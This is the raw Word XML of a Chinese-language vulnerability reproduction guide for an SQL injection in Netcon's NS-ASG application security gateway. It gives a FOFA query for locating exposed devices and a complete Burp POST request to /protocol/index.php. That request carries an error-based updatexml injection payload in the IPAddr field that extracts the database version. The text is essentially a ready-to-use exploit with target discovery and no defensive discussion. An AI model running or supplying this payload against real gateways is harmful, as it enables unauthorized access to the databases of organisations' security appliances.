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84620" w14:textId="39AB4B84" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>网康NS-ASG应用安全网关index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sql注入漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45C6F964" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="zSW1B"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>一、漏洞简介</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D5A3AE7" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u47438e73"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网康科技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的NS-ASG应用安全网关存在SQL注入</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992BE5C" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="x1nAW"/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D9D8E6F" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="SfIJb"/>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>第一步：fofa导出资产</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="006E2F51" w14:textId="77777777" w:rsidR="004E092F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" w:name="seg0h"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>网康科技</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-NS-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ASG安全网关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</w:r>
    </w:p>
    <w:p w14:paraId="1E19D4A0" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="bmIMP"/>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>第二步：访问网站首页拼接访问</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="DD1144"/>
        </w:rPr>
        <w:t>/protocol/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="DD1144"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="DD1144"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>路径抓包</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FFEB951" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="uf08b21d0"/>
      <w:bookmarkStart w:id="7" w:name="ua0e7d645"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E163147" wp14:editId="646D6B4D">
            <wp:extent cx="5841999" cy="3166044"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="695099060" name="图片 695099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2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A1850CC" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="OILOg"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第三步：使用burp抓包将数据包发送到Repeater中修改数据包进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E087B7" w14:textId="77777777" w:rsidR="004E092F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9" w:name="Fc9Ly"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /protocol/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>index.php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HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>x.x.x.x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zh-CN,zh;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, deflate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Sec-Fetch-Dest: empty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Sec-Fetch-Mode: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Sec-Fetch-Site: same-origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Te</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: trailers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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Length: 263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jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC336A5" w14:textId="77777777" w:rsidR="004E092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u2e66107c"/>
      <w:bookmarkStart w:id="11" w:name="u78ea1bb8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54BA4236" wp14:editId="088AF846">
            <wp:extent cx="5841999" cy="1524750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1530020548" name="图片 153002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7066" cy="23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AFC5A04" w14:textId="78E42A7E" w:rsidR="004E092F" w:rsidRDefault="00000000" w:rsidP="00015FCF">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="ucdf630ad"/>
      <w:bookmarkStart w:id="13" w:name="ue480d1e1"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5663430F" wp14:editId="3910880B">
            <wp:extent cx="5842000" cy="876267"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="716266889" name="图片 71626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9334" cy="13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Pnv9r"/>
      <w:bookmarkStart w:id="15" w:name="uc35e319c"/>
      <w:bookmarkStart w:id="16" w:name="u49bb75b1"/>
      <w:bookmarkStart w:id="17" w:name="u2c5e8eab"/>
      <w:bookmarkStart w:id="18" w:name="u0562d4d8"/>
      <w:bookmarkStart w:id="19" w:name="u96294425"/>
      <w:bookmarkStart w:id="20" w:name="ubd42d26d"/>
      <w:bookmarkStart w:id="21" w:name="uc3b08d11"/>
      <w:bookmarkStart w:id="22" w:name="uf5f314d8"/>
      <w:bookmarkStart w:id="23" w:name="uc0cfa682"/>
      <w:bookmarkStart w:id="24" w:name="u04602b57"/>
      <w:bookmarkStart w:id="25" w:name="u144d49be"/>
      <w:bookmarkStart w:id="26" w:name="uc028c33f"/>
      <w:bookmarkStart w:id="27" w:name="ub2db5bcd"/>
      <w:bookmarkStart w:id="28" w:name="ua52fc92c"/>
      <w:bookmarkStart w:id="29" w:name="u0d5f6f18"/>
      <w:bookmarkStart w:id="30" w:name="u46df8230"/>
      <w:bookmarkStart w:id="31" w:name="u7ceac5ea"/>
      <w:bookmarkStart w:id="32" w:name="u18d8d35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sectPr w:rsidR="004E092F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E092F"/>
    <w:rsid w:val="00015FCF"/>
    <w:rsid w:val="004E092F"/>
    <w:rsid w:val="0094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8D52"/>
  <w15:docId w15:val="{57F6A1AE-E3B2-4A55-9504-AB37A34D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2024-06-30T07:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-30T07:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>